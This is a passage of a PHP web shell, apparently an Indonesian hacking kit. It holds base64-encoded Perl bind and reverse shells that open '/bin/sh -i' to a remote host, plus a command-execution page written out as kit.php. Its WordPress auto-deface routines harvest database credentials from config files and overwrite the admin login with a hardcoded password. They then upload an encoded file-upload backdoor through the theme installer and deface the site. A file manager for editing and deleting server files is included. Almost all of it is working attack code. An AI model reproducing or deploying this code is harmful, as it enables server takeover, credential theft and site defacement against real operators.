zxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDc3MDAiIGZhY2U9IlRhaG9tYSIgc3R5bGU9ImZvbnQtc2l6ZTogMTFwdCI+VXNhZ2U6IHBlcmwgcmV2ZXJzZS5wbCBbaXBtdV0gW1BvcnRtdV08L2ZvbnQ+PGJyPic7DQplY2hvJzxwIGFsaWduPSJjZW50ZXIiPiANCjxpbWcgYm9yZGVyPSIwIiA+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDc3MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT4NCjxwPjxjZW50ZXI+SWYgbm90aGluZyB3b3JrIGl0IG1lYW5zIHRoYXQgcGVybCBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcGVybCByZXZlcnNlLnBsIHlvdXJJUCBQb3J0PC9zdHJvbmc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InZ3IiBzaXplPSI1MCIgdmFsdWU9ImNtZCI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb21tYW5kIiBzaXplPSI0MyI+IDxzZWxlY3QgbmFtZT1leGVjbWV0aG9kPg0KPG9wdGlvbiB2YWx1ZT0ic3lzdGVtIj5TeXN0ZW08L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9ImV4ZWMiPkV4ZWM8L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9InBhc3N0aHJ1Ij5QYXNzdGhydTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9InBvcGVuIj5wb3Blbjwvb3B0aW9uPg0KPC9zZWxlY3Q+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFeGVjdXRlIj4NCjwvcD48L2Zvcm0+JzsNCj8+'; $file = fopen("kit.php" ,"w+"); $write = fwrite ($file ,base64_decode($zonop)); fclose($file); echo "
Perl Connect Shell Priv8

"; } elseif($_GET['do'] == 'bc') { echo "
"; echo ""; echo "
"; echo "
Bind Port:
PORT:
Back Connect:
Server: PORT:
"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; if(isset($_POST['sub_bp'])) { $f_bp = fopen("/tmp/bp.pl", "w"); fwrite($f_bp, base64_decode($bind_port_p)); fclose($f_bp); $port = $_POST['port_bind']; $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); sleep(1); echo "
".$out."\n".exe("ps aux | grep bp.pl")."
"; unlink("/tmp/bp.pl"); } $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; if(isset($_POST['sub_bc'])) { $f_bc = fopen("/tmp/bc.pl", "w"); fwrite($f_bc, base64_decode($bind_connect_p)); fclose($f_bc); $ipbc = $_POST['ip_bc']; $port = $_POST['port_bc']; $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); sleep(1); echo "
".$out."\n".exe("ps aux | grep bc.pl")."
"; unlink("/tmp/bc.pl"); } } elseif($_GET['do'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
-> adminer login <-
"; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
-> adminer login <-
"; } else { echo "
gagal buat file adminer
"; } } }elseif($_GET['do'] == 'passwbypass') { echo '
Bypass etc/passw With:
Bypass User With :

'; if ($_POST['awkuser']) { echo"
"; } if ($_POST['systuser']) { echo"
"; } if ($_POST['passthuser']) { echo"
"; } if ($_POST['exuser']) { echo"
"; } if ($_POST['shexuser']) { echo"
"; } if($_POST['syst']) { echo"


"; } if($_POST['passth']) { echo"


"; } if($_POST['ex']) { echo"


"; } if($_POST['shex']) { echo"


"; } echo '
'; if($_POST['melex']) { echo"

"; } // // } elseif($_GET['do'] == 'auto_dwp') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST['link_config']; $link_config = scandir($scan); $script = htmlspecialchars($_POST['script']); $user = "amiqul1337"; $pass = "amiqul1337"; $passx = md5($pass); foreach($link_config as $dir_config) { if(!is_file("$scan/$dir_config")) continue; $config = file_get_contents("$scan/$dir_config"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } } else { echo "

WordPress Auto Deface




NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'auto_dwp2') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $script = htmlspecialchars($_POST['script']); $user = "amiqul1337"; $pass = "amiqul1337"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION,true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } else { echo "

WordPress Auto Deface V.2

Link Config:


"; } } elseif($_GET['act'] == 'newfile') { if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } } echo $act; echo "
Filename:
"; } elseif($_GET['act'] == 'newfolder') { if($_POST['new_save_folder']) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } } echo $act; echo "
Folder Name:
"; } elseif($_GET['act'] == 'rename_dir') { if($_POST['dir_rename']) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "
"; } elseif($_GET['act'] == 'delete_dir') { function Delete($path) { if (is_dir($path) === true) { $files = array_diff(scandir($path), array('.', '..')); foreach ($files as $file) { Delete(realpath($path) . '/' . $file); } return rmdir($path); } else if (is_file($path) === true) { return unlink($path); } return false; } $delete_dir = Delete($dir); if($delete_dir) { $act = ""; } else { $act = "could not remove ".basename($dir).""; } echo $act; } elseif($_GET['act'] == 'view') { echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = "Saved!"; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "

"; } elseif($_GET['act'] == 'rename') { if($_POST['do_rename']) { $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); if($rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "
"; } elseif($_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; }else { if(is_dir($dir) == true) { echo ''; $scandir = scandir($dir); foreach($scandir as $dirx) { $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } if($dirx === '.' || $dirx === '..') { $act_dir = "newfile | newfolder"; } else { $act_dir = "rename | delete"; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo ""; foreach($scandir as $file) { $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if(!is_file("$dir/$file")) continue; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "
Name
Type
Size
Last Modified
Permission
Action
$href
$dtype
-
"; echo "
$dtime
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
".w("$dir/$file",perms("$dir/$file"))."
edit | rename | delete | download
"; } else { echo "can't open directory"; } } echo "

"; ?>